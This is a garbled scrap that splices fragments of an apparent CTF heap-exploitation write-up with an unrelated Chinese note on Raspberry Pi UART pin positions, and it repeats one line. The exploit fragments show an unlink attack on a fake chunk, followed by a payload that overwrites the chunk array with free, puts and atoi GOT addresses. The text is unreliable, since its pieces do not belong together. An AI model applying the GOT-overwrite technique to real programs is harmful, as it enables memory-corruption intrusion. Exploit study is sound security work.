p64(0x90) edit(2, len(payload), payload) # unlink fake chunk, so chunk[2] =&(chunk[2])-0x18=head edit(2, len(payload), payload) # unlink fake chunk, so chunk[2] =&(chunk[2])-0x18=head
下面进行具体实验吧~ 树莓派环境串口透传 在开始前说明以下几点: 1、树莓派UART端口的位置:TXD位于HEAD-8;RXD位于HEAD-10;GND位于HEAD-6(可选其他GND)。
payload = p64(0)+p64(free_got)+p64(puts_got)+p64(atoi_got) edit(2,len(payload),payload) 因为此时的第 2 块指向的是head